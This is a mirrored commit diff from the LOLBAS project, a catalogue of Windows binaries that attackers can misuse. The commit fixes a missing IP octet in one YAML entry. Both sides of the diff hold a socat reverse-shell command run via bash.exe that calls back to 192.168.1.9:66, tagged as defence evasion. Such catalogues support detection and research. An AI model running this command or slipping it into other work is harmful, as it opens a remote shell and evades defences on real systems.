mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-13 23:39:23 +01:00
Fixed missing octet in command
This commit is contained in:
parent
6ac04d73d7
commit
9f110bce07
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c "socat tcp-connect:192.168.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
||||||
Description: Executes a reverseshell
|
Description: Executes a reverseshell
|
||||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
|
Loading…
Reference in New Issue
Block a user